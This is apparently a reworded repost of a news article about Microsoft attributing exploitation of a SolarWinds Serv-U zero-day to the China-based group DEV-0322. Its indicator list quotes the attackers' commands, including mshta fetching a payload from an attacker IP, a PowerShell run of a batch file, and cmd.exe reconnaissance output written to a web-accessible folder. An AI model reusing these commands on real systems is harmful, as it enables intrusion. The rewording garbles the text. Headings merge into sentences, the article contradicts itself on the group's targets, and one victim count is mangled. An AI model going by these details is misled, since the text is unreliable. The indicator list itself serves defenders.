[ad_1]
Getty Images
Microsoft said on Tuesday that China-based hackers with a history of attacking software companies and the US defense industry exploited a zero-day vulnerability in a SolarWinds product.
SolarWinds disclosed zero-day on Monday after receiving notification from Microsoft that it discovered that a previously unknown vulnerability in the SolarWinds Serv-U product line was under active exploitation. SolarWinds, based in Austin, Texas, did not provide details about the threat author behind the attacks or how their attack worked. Commercial VPNs and Compromised Consumer Routers
On Tuesday, Microsoft said the hacker group will designate DEV-0322 for now. DEV refers to a development group under study prior to when Microsoft researchers have high confidence in the origin or identity of the actor behind an operation. The company said attackers are physically located in China and often rely on botnets consisting of routers or other types of IoT devices.
MSTIC noted that DEV-0322 targets entities in the US defense industrial base sector and software companies, researchers from the Microsoft Threat Intelligence Center wrote in a post. This business group is based in China and has been observed to use commercial VPN solutions and compromised consumer routers in their attacker infrastructure.
Microsoft did not say whether DEV-0322 was targeting software companies, defense contractors, or other types of targets.
In addition to the three attacker-affiliated servers already disclosed by SolarWinds, Microsoft has provided three additional indicators that people can use to determine if they have been hacked. The indicators of compromise are:
98[.]176[.]196[.]89 68[.]235[.]178[.]32 208[.]113[.]35[.]58 144[.]34[.]179[.]162 97[.]77[.]97[.]58 hxxp: // 144[.]34[.]179[.]162 / a C: Windows Temp Serv-U.bat C: Windows Temp test current.dmp The presence of suspicious exception errors, especially in the log file DebugSocketlog.txt C: Windows System32 mshta .exe http: // 144[.]34[.]179[.]162 / a (defanged) cmd.exe / c whoami> ./Client/Common/redacted.txt cmd.exe / c dir>. Client Common redacted.txt cmd.exe / c C: Windows Temp Serv-U.bat powershell.exe C: Windows Temp Serv-U.bat cmd.exe / c type \ redacted redacted.Archive> C: ProgramData RhinoSoft Serv-U Users Global Users censored. Announcement archive
Tuesday’s post also provided new technical details about the attack. In particular:
We have observed DEV-0322 redirect the output of their cmd.exe commands to files in the Serv-U Client Common folder, which is accessible from the Internet by default, so that attackers can retrieve the results of the commands. The actor was also found adding a new global user to Serv-U, actually adding himself as a Serv-U administrator, by manually creating a crafted .Archive file in the Global Users directory. Serv-U user information is stored in these .Archive files.
Due to the way DEV-0322 wrote its code, when the exploit successfully compromises the Serv-U process, an exception is thrown and logged in a Serv-U log file, DebugSocketLog.txt. The process may also crash after executing a malicious command.
By examining the telemetry, we identified characteristics of the exploit, but not a root vulnerability. MSTIC worked with the Microsoft Offensive Security Research team, which researched the vulnerability on the Serv-U binary and identified the vulnerability through black box analysis. Once we found a root cause, we reported the vulnerability to SolarWinds, who responded quickly to understand the problem and create a patch.
The zero-day vulnerability, traced as CVE-2021-35211, resides in the SolarWinds Serv-U product, which customers use to transfer files across networks. When Serv-U SSH is exposed to the Internet, exploits give attackers the ability to remotely execute malicious code with elevated system privileges. From there, attackers can install and run malicious payloads, or they can view and modify data.
SolarWinds became a household name overnight in late December when researchers discovered it was at the center of a supply chain attack with global reach. After compromising the SolarWinds software creation system, the attackers used their login to send a malicious update to approximately 18,000 customers of the company’s Orion network management tool.
Of these 18,000 customers, about nine in US government agencies and about 100 in private industry received subsequent malware. The federal government attributed the attacks to the Russian Foreign Intelligence Service, abbreviated to SVR. For over a decade, SVR has conducted malware campaigns targeting governments, political pundit groups, and other organizations around the world.
The zero-day attacks that Microsoft has discovered and reported are unrelated to the Orion supply chain attack.
SolarWinds fixed the vulnerability over the weekend. Anyone using a vulnerable version of Serv-U should update immediately and check for signs of compromise.
|
Sources 2/ https://arstechnica.com/gadgets/2021/07/microsoft-says-hackers-in-china-exploited-critical-solarwinds-0-day/ The mention sources can contact us to remove/changing this article |
[ad_2]